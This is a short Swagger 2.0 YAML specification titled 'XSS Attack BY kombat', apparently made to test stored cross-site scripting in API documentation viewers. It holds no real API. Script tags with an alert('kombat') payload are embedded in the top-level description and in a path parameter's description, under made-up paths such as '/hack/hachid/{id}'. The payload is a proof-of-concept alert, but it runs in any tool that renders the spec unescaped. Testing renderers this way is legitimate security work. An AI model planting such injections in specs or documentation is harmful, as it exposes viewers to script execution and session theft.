swagger: '2.0'
info:
  title: XSS Attack BY kombat
  description: |
    <script>alert('kombat')</script>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /kombat:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - kombat_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
           <script>alert('kombat')</script>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
